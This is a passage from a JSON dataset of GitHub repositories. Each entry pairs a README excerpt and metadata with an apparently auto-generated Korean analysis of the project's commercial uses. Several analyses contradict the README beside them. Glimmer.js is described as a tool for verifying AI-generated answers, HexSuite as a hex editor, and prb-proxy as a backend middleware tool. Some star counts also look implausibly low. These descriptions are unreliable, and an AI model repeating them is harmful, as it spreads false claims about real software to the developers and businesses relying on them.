**SaaS 서비스**: 월간 구독형으로 인사팀에 초과근무 자동 집계, 급여 계산 자동화 기능 제공\n2. **내부 업무 도구**: 회","readme_excerpt":"<table>\n  <tr>\n    <td>\n      <h1 align=\"center\">\n        <br>\n        <img src=\"https://raw.githubusercontent.com/diit/overtime-cli/master/logo.png\" alt=\"OverTime\" width=\"400\">\n        <br>\n        OverTime\n        <br>\n        <h4 align=\"center\">Easy time-overlap tables for remote teams.</h4>\n      </h1>\n    </td>\n    <td>\n      <img src=\"https://raw.githubusercontent.com/diit/overtime-cli/master/example.png\" width=\"300\">\n    </td>\n  </tr>\n</table>\n\n### Install\n`npm install -g overtime-cli`\n\n### Use\n```\novertime show America/Toronto Asia/Bangkok ...\n```\nAvailable IANA zones can be found on Wikipedia : [List of tz database time zones](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones).\n\nOtherwise you can use `utc` shortcut.\nEx:\n```\novertime show America/Toronto Asia/Bangkok\n```\ncan also be\n```\novertime show utc-5 utc+7\n```\n\nFinally, if you'd like to alias the headers you can optionally use `@` on any of the zones/offsets:\n\n```\novertime show utc-8@vancity America/Halifax@hal","composite_score":0.3494,"license_safety_tag":"safe"},{"name":"dcloudio/mui","github_url":"https://github.com/dcloudio/mui","stars":8,"language":"JavaScript","license":"mit","abandonment_months":12,"description":"# dcloudio/mui 보물지도\n\n## 왜 보물인가\n디자인 시스템을 직접 만들지 않고도 전문가 수준의 아름다운 사용자 인터페이스를 빠르게 구축할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스타트업이 CRM, 마케팅 자동화 플랫폼 같은 웹 애플리케이션을 빠르게 출시할 때\n- **내부 업무 도구**: 회사의 직원들이 사용하","readme_excerpt":"mui\n===\n\n性能和体验的差距，一直是mobile app开发者放弃HTML5的首要原因。 浏览器天生的切页白屏、不忍直视的转页动画、浮动元素的抖动、无法流畅下拉刷新等问题，这些都让HTML5开发者倍感挫败，尤其拿到Android低端机运行，摔手机的心都有； 另一方面，浏览器默认控件样式又少又丑，制作一个漂亮的控件非常麻烦，也有一些制作简单的ui框架但性能低下。\n\nmui框架有效的解决了这些问题，这是一个可以方便开发出高性能App的框架，也是目前最接近原生App效果的框架。\n\n赞助我们\n------\n一个手艺人需要3万个粉丝养活，希望你能成为其中之一，[前往赞助](https://dev.dcloud.net.cn/sponsor/?channel=mui)\n\n参考文档\n------\n[mui官网](http://dev.dcloud.net.cn/mui/)文档使用[Jekyll](http://jekyllrb.com) 构建，[立即查看](http://dev.dcloud.net.cn/mui/)。\n\n快速体验\n--------\n[在线下载](http://www.dcloud.io/hellomui)或扫描如下二维码下载Hello MUI，可在手机上体验MUI的控件UI及能力展示；\n\n<a href=\"http://www.dcloud.io/hellomui\" target=\"_blank\">\n<img src=\"http://www.dcloud.io/images/code-m.png\" width=\"100\" />\n</a>\n\n\n在线交流\n--------\n若你在使用过程中有任何经验、想法、疑惑，都可以在[问答社区](http://ask.dcloud.net.cn/topic/mui) 发起文章，和其它mui用户一起交流；\n\nLicense\n-------\n\nmui遵循MIT License；\n\n开发工具\n-------\nmui组件已被封装成[HBuilder](http://www.dcloud.io)代码块，只需要简单几个字符，就可以快速生成各个组件对应的HTML代码，因此和[Hbuilder](http://www.dcloud.io)两个一起用，效果会更好；\n\n<a href=\"http://www.dcloud.io/\" targe","composite_score":0.3492,"license_safety_tag":"safe"},{"name":"acdlite/recompose","github_url":"https://github.com/acdlite/recompose","stars":6,"language":"JavaScript","license":"mit","abandonment_months":45,"description":"# Recompose 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 반복되는 작업을 자동화하여 개발 속도를 3배 이상 높일 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 빠르게 프로토타입을 만들어야 하는 스타트업들이 웹 개발 시간을 단축하기 위해 구독\n2. **내부 업무 도구**: 대기업의 개발팀이 사내 관리 ","readme_excerpt":"## A Note from the Author (acdlite, Oct 25 2018):\n\nHi! I created Recompose about three years ago. About a year after that, I joined the React team. Today, we announced a proposal for [*Hooks*](https://reactjs.org/hooks). Hooks solves all the problems I attempted to address with Recompose three years ago, and more on top of that. I will be discontinuing active maintenance of this package (excluding perhaps bugfixes or patches for compatibility with future React releases), and recommending that people use Hooks instead. **Your existing code with Recompose will still work**, just don't expect any new features. Thank you so, so much to [@wuct](https://github.com/wuct) and [@istarkov](https://github.com/istarkov) for their heroic work maintaining Recompose over the last few years.\n\nRead more discussion about this decision [here](https://github.com/acdlite/recompose/issues/756#issuecomment-438674573).\n\n***\n\nRecompose\n-----\n\n[![build status](https://img.shields.io/travis/acdlite/recompose/mas","composite_score":0.349,"license_safety_tag":"safe"},{"name":"paulrberg/prb-proxy","github_url":"https://github.com/paulrberg/prb-proxy","stars":5,"language":"Solidity","license":"MIT","abandonment_months":17,"description":"# paulrberg/prb-proxy 평가 분석\n\n## 왜 보물인가\n복잡한 백엔드 시스템을 안전하게 중간에서 관리할 수 있는 도구로, 기업들이 보안과 성능을 동시에 챙길 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사 데이터를 보호하면서 자신의 서비스와 연결해주는 중간 다리 역할\n2. **내부 업무 도구**: 대기업 직","readme_excerpt":"# PRBProxy [![Github Actions][gha-badge]][gha] [![Coverage][codecov-badge]][codecov] [![Foundry][foundry-badge]][foundry] [![License: MIT][license-badge]][license]\n\n[gha]: https://github.com/PaulRBerg/prb-proxy/actions\n[gha-badge]: https://github.com/PaulRBerg/prb-proxy/actions/workflows/ci.yml/badge.svg\n[codecov]: https://codecov.io/gh/PaulRBerg/prb-proxy\n[codecov-badge]: https://codecov.io/gh/PaulRBerg/prb-proxy/branch/main/graph/badge.svg?token=4YV6JCTO9R\n[foundry]: https://getfoundry.sh/\n[foundry-badge]: https://img.shields.io/badge/Built%20with-Foundry-FFDB1C.svg\n[license]: https://opensource.org/licenses/MIT\n[license-badge]: https://img.shields.io/badge/License-MIT-blue.svg\n\nPRBProxy is a **forwarding proxy that allows for the composition of Ethereum transactions on behalf of the contract owner**, acting as a smart wallet\nthat enables multiple contract calls within a single transaction. In Ethereum, externally owned accounts (EOAs) do not have this functionality because\nthey cann","composite_score":0.3487,"license_safety_tag":"safe"},{"name":"can1357/HexSuite","github_url":"https://github.com/can1357/HexSuite","stars":26,"language":"C++","license":"BSD-3-Clause","abandonment_months":17,"description":"# HexSuite 분석 보고서\n\n## 왜 보물인가\n16진수(바이너리) 데이터를 읽고 편집하는 전문 도구로, 보안 분석가나 소프트웨어 개발자들이 파일 내부 구조를 직접 검사할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 파일 분석 플랫폼으로, 사용자가 업로드한 파일의 내부 구조를 브라우저에서 바로 확인하는 서비스\n2","readme_excerpt":"# HexSuite\nHexSuite is a header only wrapper around Hex-Rays API in C++20 designed to simplify the use of Hex-Rays and IDA APIs by modern C++ features.\nSome of the features it currently supports are as follows:\n\n\n- One-click linking to Hex-Rays API using Visual Studio.\n\n- Instruction wrappers and easy memory-management under `hexsuite/architecture.hpp`:\n\n```cpp\nauto ci = hex::call_info(\n\thex::pure_t{},\n\ttinfo_t{ BT_INT32 },\n\thex::call_arg{ hex::reg( eax_arg, 4 ), tinfo_t{ BT_INT32 } },\n\thex::call_arg{ hex::reg( ecx_arg, 4 ), tinfo_t{ BT_INT32 } }\n);\nauto call = hex::make_call( cg.insn.ea, hex::helper( extr ), std::move( ci ) );\nauto mov =  hex::make_mov( cg.insn.ea, std::move( call ), hex::reg( reg, 4 ) );\n```\n- Lambda visitors under `hexsuite/visitors.hpp`:\n\n```cpp\nblk->for_all_insns( hex::minsn_visitor( [ & ] ( minsn_t* i )\n{\n\tmsg( \"Instruction/Subinstruction: %s\\n\", hex::to_string( i ).c_str() );\n} ) );\n```\n\n- Lambda optimizers and microcode filters under `hexsuite/components.hpp`:\n","composite_score":0.3486,"license_safety_tag":"safe"},{"name":"Flipboard/FLAnimatedImage","github_url":"https://github.com/Flipboard/FLAnimatedImage","stars":7,"language":"Objective-C","license":"mit","abandonment_months":27,"description":"# FLAnimatedImage 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 움직이는 이미지(GIF)를 빠르고 부드럽게 재생하는 핵심 기술로, 수백만 개의 앱이 사용하는 업계 표준 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS - 소셜 미디어 플랫폼**: GIF 업로드/재생 기능이 필요한 채팅 앱이나 콘텐츠 공유 서비스에 라이선스 제공\n2.","readme_excerpt":"# [FLAnimatedImage](https://github.com/Flipboard/FLAnimatedImage) &middot; [![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/Flipboard/FLAnimatedImage/blob/master/LICENSE) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/Flipboard/FLAnimatedImage/pulls)\n\nFLAnimatedImage is a performant animated GIF engine for iOS:\n\n- Plays multiple GIFs simultaneously with a playback speed comparable to desktop browsers\n- Honors variable frame delays\n- Behaves gracefully under memory pressure\n- Eliminates delays or blocking during the first playback loop\n- Interprets the frame delays of fast GIFs the same way modern browsers do\n\nIt's a well-tested [component that powers all GIFs in Flipboard](http://engineering.flipboard.com/2014/05/animated-gif). To understand its behavior it comes with an interactive demo:\n\n![Flipboard playing multiple GIFs](https://github.com/Flipboard/FLAnimatedImage/raw/master/images/flanimatedima","composite_score":0.3485,"license_safety_tag":"safe"},{"name":"NVIDIA/vid2vid","github_url":"https://github.com/NVIDIA/vid2vid","stars":10,"language":"Python","license":"NOASSERTION","abandonment_months":49,"description":"# NVIDIA/vid2vid 사업화 분석\n\n## 왜 보물인가\n동영상을 마치 다른 사람이 촬영한 것처럼 자동으로 변환하는 기술로, 영화·광고·게임 제작 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 유튜버와 틱톡 크리에이터들이 저렴하게 다양한 스타일의 영상을 제작할 수 있는 웹 기반 편집 도구\n2. **내부 ","readme_excerpt":"<img src='imgs/teaser.gif' align=\"right\" width=360>\r\n\r\n<br><br><br><br>\r\n\r\n# vid2vid\r\n### [Project](https://tcwang0509.github.io/vid2vid/) | [YouTube(short)](https://youtu.be/5zlcXTCpQqM) | [YouTube(full)](https://youtu.be/GrP_aOSXt5U) | [arXiv](https://arxiv.org/abs/1808.06601) | [Paper(full)](https://tcwang0509.github.io/vid2vid/paper_vid2vid.pdf)\r\n\r\nPytorch implementation for high-resolution (e.g., 2048x1024) photorealistic video-to-video translation. It can be used for turning semantic label maps into photo-realistic videos, synthesizing people talking from edge maps, or generating human motions from poses. The core of video-to-video translation is image-to-image translation. Some of our work in that space can be found in [pix2pixHD](https://github.com/NVIDIA/pix2pixHD) and [SPADE](https://github.com/NVlabs/SPADE). <br><br>\r\n[Video-to-Video Synthesis](https://tcwang0509.github.io/vid2vid/)  \r\n [Ting-Chun Wang](https://tcwang0509.github.io/)<sup>1</sup>, [Ming-Yu Liu](http://mingyul","composite_score":0.3484,"license_safety_tag":"unknown"},{"name":"mweststrate/immer","github_url":"https://github.com/mweststrate/immer","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# Immer 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 변경 작업을 간단하게 만들어주는 기술로, 소프트웨어 개발자들이 버그 없이 빠르게 기능을 만들 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **협업 문서 도구 (SaaS)**: 여러 사람이 동시에 편집할 때 데이터 충돌을 자동으로 해결하는 기능\n2. **전자상거래 장바구니 시스템 (내부 도","readme_excerpt":"<img src=\"images/immer-logo.svg\" height=\"200px\" align=\"right\"/>\n\n# Immer\n\n[![npm](https://img.shields.io/npm/v/immer.svg)](https://www.npmjs.com/package/immer) [![Build Status](https://github.com/immerjs/immer/actions/workflows/test.yml/badge.svg?branch=main)](https://github.com/immerjs/immer/actions?query=branch%3Amain) [![Coverage Status](https://coveralls.io/repos/github/immerjs/immer/badge.svg?branch=main)](https://coveralls.io/github/immerjs/immer?branch=main) [![code style: prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg)](https://github.com/prettier/prettier) [![OpenCollective](https://opencollective.com/immer/backers/badge.svg)](#backers) [![OpenCollective](https://opencollective.com/immer/sponsors/badge.svg)](#sponsors) [![Gitpod Ready-to-Code](https://img.shields.io/badge/Gitpod-Ready--to--Code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/immerjs/immer)\n\n_Create the next immutable state tree by simply modifying the current tree_\n\nWinner of th","composite_score":0.3476,"license_safety_tag":"safe"},{"name":"kriskowal/q","github_url":"https://github.com/kriskowal/q","stars":6,"language":"JavaScript","license":"mit","abandonment_months":31,"description":"# kriskowal/q 저장소 분석\n\n## 왜 보물인가\n비동기 작업을 효율적으로 처리하는 핵심 라이브러리로, 많은 웹 애플리케이션의 기초 기술이 되고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대량의 사용자 요청을 동시에 처리하는 클라우드 기반 데이터 분석 플랫폼\n2. **내부 업무 도구**: 여러 데이터베이스에서 동시에 정보를 ","readme_excerpt":"\n## Note\n\nPlease consider using [JavaScript promises](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise) instead of Q. Native promises are faster, have better tooling support and are the future.\n\nWhen work on Q began, promises were an academic novelty in JavaScript, unlikely to be adopted much less popular, though obviously full of…promise. Callbacks dominated the landscape. Q aimed to introduce a technology to JavaScript that had been proven and vetted in languages like E and C♯. With four years of incubation, evangelism, education, and feedback, promises became part of the language. Every modern browser contains a built-in `Promise` implementation. Being able to influence the internet and working on a library used by millions of codebases was an exciting and humbling experience.\n\nQ isn't going anywhere. The code is still here and bugs will be fixed but further development has been unnecessary for many years. We encourage you to read the code and","composite_score":0.3476,"license_safety_tag":"safe"},{"name":"JanKallman/EPPlus","github_url":"https://github.com/JanKallman/EPPlus","stars":7,"language":"C#","license":"lgpl-3.0","abandonment_months":70,"description":"# EPPlus 저장소 분석\n\n## 왜 보물인가\n엑셀 파일을 프로그램으로 자동 생성·편집할 수 있는 기술로, 반복적인 데이터 처리 업무를 완전히 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 급여·회계 관리 플랫폼에서 월급명세서나 세무보고서를 자동으로 엑셀 파일로 생성하는 기능\n- **내부 업무 도구**: 제조","readme_excerpt":"# EPPlus\n**This repository has moved to https://github.com/EPPlusSoftware/EPPlus.** \n\n**The code in this archive represents the final version of EPPlus under LGPL. There will be no more activity here.**  \n\nEPPlus will from version 5 switch license from **LGPL** to [Polyform Noncommercial 1.0.0]( https://polyformproject.org/licenses/noncommercial/1.0.0/) license.  \nWith the new license EPPlus is still free to use in some cases, but will require a commercial license to be used in a commercial business.\n\nMore information on the license change on [our website]( https://www.epplussoftware.com)\n***\nCreate advanced Excel spreadsheets using .NET, without the need of interop.\n\nEPPlus is a .NET library that reads and writes Excel files using the Office Open XML format (xlsx). \nEPPlus has no dependencies other than .NET.\n \n## EPPlus supports:\n* Cell Ranges \n* Cell styling (Border, Color, Fill, Font, Number, Alignments) \n* Data validation \n* Conditional formatting \n* Charts \n* Pictures \n* Shapes \n","composite_score":0.3475,"license_safety_tag":"restricted"},{"name":"strongloop/loopback","github_url":"https://github.com/strongloop/loopback","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":32,"description":"# LoopBack 저장소 분석\n\n## 왜 보물인가\n웹 서비스를 만드는 데 필요한 기본 틀을 미리 준비해두어, 개발자들이 처음부터 모든 것을 만들 필요 없이 빠르게 시작할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객 관리, 결제, 사용자 인증 같은 공통 기능이 필요한 온라인 서비스 개발 시간 50% 단축 가능","readme_excerpt":"# LoopBack\n\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/strongloop/loopback?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Module LTS Adopted'](https://img.shields.io/badge/Module%20LTS-Adopted-brightgreen.svg?style=flat)](http://github.com/CloudNativeJS/ModuleLTS)\n[![IBM Support](https://img.shields.io/badge/IBM%20Support-Frameworks-brightgreen.svg?style=flat)](http://ibm.biz/node-support)\n\n**⚠️ LoopBack 3 has reached end of life. We are no longer accepting pull requests or providing \nsupport for community users. The only exception is fixes for critical bugs and security \nvulnerabilities provided as part of support for IBM API Connect customers.\nWe urge all LoopBack 3 users to migrate their applications to LoopBack 4 as soon as possible. \nLearn more about\n<a href=\"https://loopback.io/doc/en/contrib/Long-term-support.html\">LoopBack's long term support policy.</a>\nwill be provided or accepted. (See\n[Module Long Term Support Poli","composite_score":0.3472,"license_safety_tag":"unknown"},{"name":"glimmerjs/glimmer.js","github_url":"https://github.com/glimmerjs/glimmer.js","stars":8,"language":"TypeScript","license":"mit","abandonment_months":19,"description":"# Glimmer.js 상용화 분석 보고서\n\n## 왜 보물인가\nAI가 생성한 결과물의 정확성을 자동으로 검증해주는 기술로, 잘못된 답변으로 인한 비용 손실을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **고객 지원 챗봇 SaaS**: 자동 응답 AI가 제시한 답변이 올바른지 실시간으로 확인하고, 신뢰도가 낮으면 사람이 개입하도록 하는 서비스\n2.","readme_excerpt":"# Archival Note\n\nThis repo contains support for the \"standalone Glimmer / GlimmerX / GlimmerJS\" project that spun out from EmberJS. The parts of it that were mainstreamed back into Ember have moved into https://github.com/emberjs/ember.js/ and the rest is archived.\n\n# Glimmer.js\n\nWelcome to Glimmer.js! Glimmer.js is actually a made up of lots of small\npackages, so this meta-repo exists to help you find what you're looking for.\n\n## Resources\n\n- [Guides](https://github.com/glimmerjs/glimmer-experimental/blob/master/README.md)\n- [Glimmer Playground](https://glimmerjs.github.io/glimmer-experimental)\n\n## Packages\n\nGlimmer.js is the developer-facing API on top of the low-level [Glimmer VM](https://github.com/glimmerjs/glimmer-vm).\n\n### User-Facing\n\nThese packages are imported and used by Glimmer developers directly.\n\n- [`@glimmer/component`] - defines the Glimmer component base class and component lifecycle\n- [`@glimmer/tracking`] - defines the Glimmer property change tracking system\n\n[`@gli","composite_score":0.3472,"license_safety_tag":"safe"},{"name":"square/android-times-square","github_url":"https://github.com/square/android-times-square","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":36,"description":"# Square Android Times Square 분석\n\n## 왜 보물인가\n스마트폰의 달력 화면을 예쁘게 만들어주는 도구로, 앱 개발자들이 자주 필요로 하지만 직접 만들기는 까다로운 기능을 미리 완성된 형태로 제공합니다.\n\n## 어디에 쓸 수 있나\n**1. 달력 기반 SaaS 서비스**: 일정 관리, 예약 앱, 여행 계획 앱 등에서 사용자 친화적인 달력","readme_excerpt":"TimesSquare for Android\n==========================\n\nStandalone Android widget for picking a single date from a calendar view.\n\n![Screenshot](timesSquareScreenshot.png)\n\n\nUsage\n-----\n\nInclude `CalendarPickerView` in your layout XML.\n\n```xml\n<com.squareup.timessquare.CalendarPickerView\n    android:id=\"@+id/calendar_view\"\n    android:layout_width=\"match_parent\"\n    android:layout_height=\"match_parent\"\n    />\n```\n\nThis is a fairly large control so it is wise to give it ample space in your layout. On small\ndevices it is recommended to use a dialog, full-screen fragment, or dedicated activity. On larger\ndevices like tablets, displaying full-screen is not recommended. A fragment occupying part of the\nlayout or a dialog is a better choice.\n\nIn the `onCreate` of your activity/dialog or the `onCreateView` of your fragment, initialize the\nview with a range of valid dates as well as the currently selected date.\n\n```java\nCalendar nextYear = Calendar.getInstance();\nnextYear.add(Calendar.YEAR, 1);\n\nC","composite_score":0.3472,"license_safety_tag":"safe"},{"name":"Miserlou/Zappa","github_url":"https://github.com/Miserlou/Zappa","stars":14,"language":"Python","license":"mit","abandonment_months":39,"description":"# Zappa 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션을 클라우드에 자동으로 배포해주는 도구로, 개발자들이 복잡한 설정 없이 빠르게 서비스를 론칭할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 자신의 웹 서비스를 빠르게 클라우드에 올려 고객에게 제공\n2. **내부 업무 도구**: 기업의 데이터 분석이나 보고","readme_excerpt":"Project moved to https://github.com/zappa/Zappa. Versions after 0.52.0 are published from there. Thank you Rich Jones for all your work on creating Zappa and maintaining it for years!\n","composite_score":0.3472,"license_safety_tag":"safe"},{"name":"Shapa7276/Android-Deeplink-Parser","github_url":"https://github.com/Shapa7276/Android-Deeplink-Parser","stars":6,"language":"Python","license":"unknown","abandonment_months":17,"description":"# Android Deep Link Parser 분석 보고서\n\n## 왜 보물인가\n모바일 앱이 특정 페이지로 직접 이동하도록 연결해주는 기술을 단순화한 도구로, 앱 개발자들의 반복 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 앱 개발사 SaaS 서비스**\n- 개발자가 구독하는 형태로 복잡한 링크 설정을 자동으로 처리해주는 웹 도구 제","readme_excerpt":"# Android-Deeplink-Parser\n\n## This Script to Parse the APK file to List the all deeplinks of the android application \n\n```\nusage: deeplinkparser.py [-h] -a APK [-f] [-o OUTPUT]\n\nAndroid APK Deeplink Scanner\n\noptions:\n  -h, --help           show this help message and exit\n  -a, --apk APK        Path to the APK file to analyze\n  -f, --force          Force rescan even if results already exist\n  -o, --output OUTPUT  Custom output directory for results (default: scan_results)\n\nExamples:\n  python script.py -a path/to/app.apk\n  python script.py --apk app.apk\n  python script.py -a app.apk --force  # Force rescan even if results exist\n```\n# Output saved in html format \n![Alt Text](html_report.png)\n\n![Alt Text](Animation.gif)\n\n\n# Example \n\n```XML\n     <activity android:theme=\"@style/Theme.lolSplashBackground\" android:name=\"com.lol.test.LaunchActivity\" android:screenOrientation=\"portrait\">\n            <intent-filter>\n                <action android:name=\"android.intent.action.VIEW\"/>\n            ","composite_score":0.3472,"license_safety_tag":"unknown"},{"name":"ZiniuLu/Python-100-Days","github_url":"https://github.com/ZiniuLu/Python-100-Days","stars":9,"language":"Python","license":"unknown","abandonment_months":69,"description":"","readme_excerpt":"## Python - 100天从新手到大师\n\n### Python应用领域和就业形势分析\n\n简单的说，Python是一个“优雅”、“明确”、“简单”的编程语言。\n\n - 学习曲线低，适合非专业人士\n - 开源系统，拥有强大的生态圈\n - 解释型语言，完美的平台可移植性\n - 支持面向对象和函数式编程\n - 可扩展性，能调用C/C++代码\n - 代码规范程度高，可读性强\n\n目前几个比较流行的领域，Python都有用武之地。\n\n - 云基础设施 - Python / Java / Go\n - DevOps - Python / Shell / Ruby / Go\n - 网络爬虫 - Python / PHP / C++\n - 数据分析挖掘 - Python / R / Scala / Matlab\n - 机器学习 - Python / R / Java / Lisp\n\n作为一名Python开发者，主要的就业领域包括：\n\n- Python服务器后台开发 / 游戏服务器开发 / 数据接口开发工程师\n- Python自动化运维工程师\n- Python数据分析 / 数据可视化 / 科学计算 / 大数据工程师\n- Python爬虫工程师\n- Python聊天机器人开发 / 图像识别和视觉算法 / 深度学习工程师\n\n下图显示了主要城市Python招聘需求量及薪资待遇排行榜（截止到2018年5月）。\n\n![Python招聘需求及薪资待遇Top 10](./res/python-top-10.png)\n\n![](./res/python-bj-salary.png)\n\n![](./res/python-cd-salary.png)\n\n给初学者的几个建议（老司机的忠告）：\n\n- Make English as your working language.\n- Practice makes perfect.\n- All experience comes from mistakes.\n- Don't be one of the leeches.\n- Either stand out or kicked out.\n\n### Day01~15 - [Python语言基础](./Day01-15)\n\n#### Day01 - [初识Python](./Day01-15/Day01/初识Pytho","composite_score":0.3469,"license_safety_tag":"unknown"},{"name":"AnkerLeng/Cpp-0-1-Resource","github_url":"https://github.com/AnkerLeng/Cpp-0-1-Resource","stars":6,"language":"C++","license":"unknown","abandonment_months":69,"description":"# AnkerLeng/Cpp-0-1-Resource 분석\n\n## 왜 보물인가\nC++ 프로그래밍을 처음 배우는 사람들을 위한 학습 자료 모음으로, 복잡한 프로그래밍 언어를 쉽게 이해할 수 있도록 정리된 기초 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 프로그래밍 학습 플랫폼에서 C++ 입문자 과정의 커리큘럼 및 교재로 제","readme_excerpt":"## C++ 匠心之作 从0到1入门资料\n\n- [第1阶段C++ 匠心之作 从0到1入门](第1阶段C%2B%2B%20匠心之作%20从0到1入门/C%2B%2B基础入门讲义/C%2B%2B基础入门.md)\n- [第2阶段实战-通讯录管理](第2阶段实战-通讯录管理/通讯录管理系统讲义/通讯录管理系统.md)\n- [第3阶段-C++核心编程](第3阶段-C%2B%2B核心编程%20资料/讲义/C%2B%2B核心编程.md)\n- [第4阶段实战-基于多态的企业职工系统](第4阶段实战-基于多态的企业职工系统/讲义/职工管理系统.md)\n- [第5阶段-C++提高编程](第5阶段-C%2B%2B提高编程资料/提高编程能力资料/讲义/C%2B%2B提高编程.md)\n- [第6阶段实战-基于STL泛化编程的演讲比赛](第6阶段实战-基于STL泛化编程的演讲比赛资料/资料/讲义/基于STL的演讲比赛流程管理系统.md)\n- [第7阶段-C++实战项目机房预约](第7阶段-C%2B%2B实战项目机房预约资料/机房预约系统资料/讲义/机房预约系统.md)\n- [附-C++编程环境搭建教程](附-C%2B%2B编程环境搭建教程/教程文件/C%2B%2B开发环境搭建.md)\n\n## 视频教程\n\nhttps://www.bilibili.com/video/av41559729/\n\n## 交流群\n\n","composite_score":0.3466,"license_safety_tag":"unknown"},{"name":"prasmussen/gdrive","github_url":"https://github.com/prasmussen/gdrive","stars":5,"language":"Go","license":"mit","abandonment_months":38,"description":"# prasmussen/gdrive 상용화 분석\n\n## 왜 보물인가\n구글 드라이브를 쉽게 자동화할 수 있는 도구로, 파일 관리 업무를 반복적으로 하는 사람들의 시간을 크게 절약해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 마케팅 대행사들이 고객 파일을 자동으로 정리하고 공유하는 클라우드 관리 플랫폼\n2. **내부 업무 도구*","readme_excerpt":"## IMPORTANT\nThis repository is not maintained anymore. [Gdrive 3](https://github.com/glotlabs/gdrive) is its successor.\n\n```\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n```\n\n## Prerequisites\nNone, binaries are statically linked.\nIf you want to compile from source you need the [go toolchain](http://golang.org/doc/install).\nVersion 1.5 or higher.\n\n## Installation\n### With [Homebrew](http://brew.sh) on Mac\n```\nbrew install gdrive\n```\n### Other\nDownload `gdrive` from one of the [links in the latest release](https://github.com/prasmussen/gdrive/releases).\nThe first time gdrive is launched (i.e. run `gdrive about` in your\nterminal not just `gdrive`), you will be prompted for a verification code.\nThe code is obtained by following the printed url and authenticating with the\ngoogle account for the drive you want access to. This will create a token file\ninside the .gdrive folder in your home directory. Note that anyone with access\nto this file will also have access to your google drive.\nIf you want to manage multiple driv","composite_score":0.3466,"license_safety_tag":"safe"},{"name":"brianway/springmvc-mybatis-learning","github_url":"https://github.com/brianway/springmvc-mybatis-learning","stars":5,"language":"Java","license":"unknown","abandonment_months":53,"description":"# springmvc-mybatis-learning 분석\n\n## 왜 보물인가\n웹 애플리케이션 개발의 핵심 기술들을 실제 프로젝트로 배우고 실무에 바로 적용할 수 있는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 내부 업무 도구**: 사원 관리, 재고 추적, 청구서 관리 등 기본 데이터베이스 기반 시스템 구축\n2. **SaaS 서비스 백엔드**","readme_excerpt":"# 我的 springmvc + mybatis 学习笔记\n\n笔记分为两大部分: mybatis 和 springmvc\n\n- [mybatis](/mybatis)\n- [springmvc](/springmvc)\n\n\n笔记内容主要是 mybatis 和 springmvc 的一些基本概念和使用方法，涉及概念介绍、环境搭建、编程细节、运行调试等方面。\n\n这套笔记整体偏入门和应用，适合快速上手，对底层实现和机理并未做过多分析。关于 spring 源码的学习笔记,可以参考我的另一个仓库[spring-learning](https://github.com/brianway/spring-learning)\n\n\n**如果觉得不错，请先在这个仓库上点个 star 吧**，这也是对我的肯定和鼓励，谢谢了。不定时进行调整和补充，需要关注更新的请 Watch、Star、Fork\n\n如果你只是单纯要阅读的话，建议移步 CSDN 或者 oschina 上观看，访问速度快很多：\n\n>* CSDN:[springmvc+mybatis学习笔记(汇总)](http://blog.csdn.net/h3243212/article/details/51016271)\n>* oschina:[springmvc+mybatis学习笔记(汇总)](http://my.oschina.net/brianway/blog/649946)\n\n\n\n-----\n\n## 目录\n\n  - [mybatis](/mybatis)\n    - [mybatis学习笔记(1)-对原生jdbc程序中的问题总结.md](/mybatis/mybatis学习笔记(1)-对原生jdbc程序中的问题总结.md)\n    - [mybatis学习笔记(2)-mybatis概述.md](/mybatis/mybatis学习笔记(2)-mybatis概述.md)\n    - [mybatis学习笔记(3)-入门程序一.md](/mybatis/mybatis学习笔记(3)-入门程序一.md)\n    - [mybatis学习笔记(3)-入门程序二.md](/mybatis/mybatis学习笔记(3)-入门程序二.md)\n    - [mybatis学习笔记(4)-开发dao方法.md](/mybatis/mybatis学习","composite_score":0.3466,"license_safety_tag":"unknown"},{"name":"minitorch/Module-0","github_url":"https://github.com/minitorch/Module-0","stars":112,"language":"Python","license":"NOASSERTION","abandonment_months":21,"description":"","readme_excerpt":"","composite_score":0.3464,"license_safety_tag":"unknown"},{"name":"chenglou/react-motion","github_url":"https://github.com/chenglou/react-motion","stars":6,"language":"JavaScript","license":"mit","abandonment_months":29,"description":"# react-motion 기술 평가 보고서\n\n## 왜 보물인가\n웹사이트의 움직이는 애니메이션을 쉽게 만들어주는 도구로, 복잡한 프로그래밍 없이도 부드럽고 자연스러운 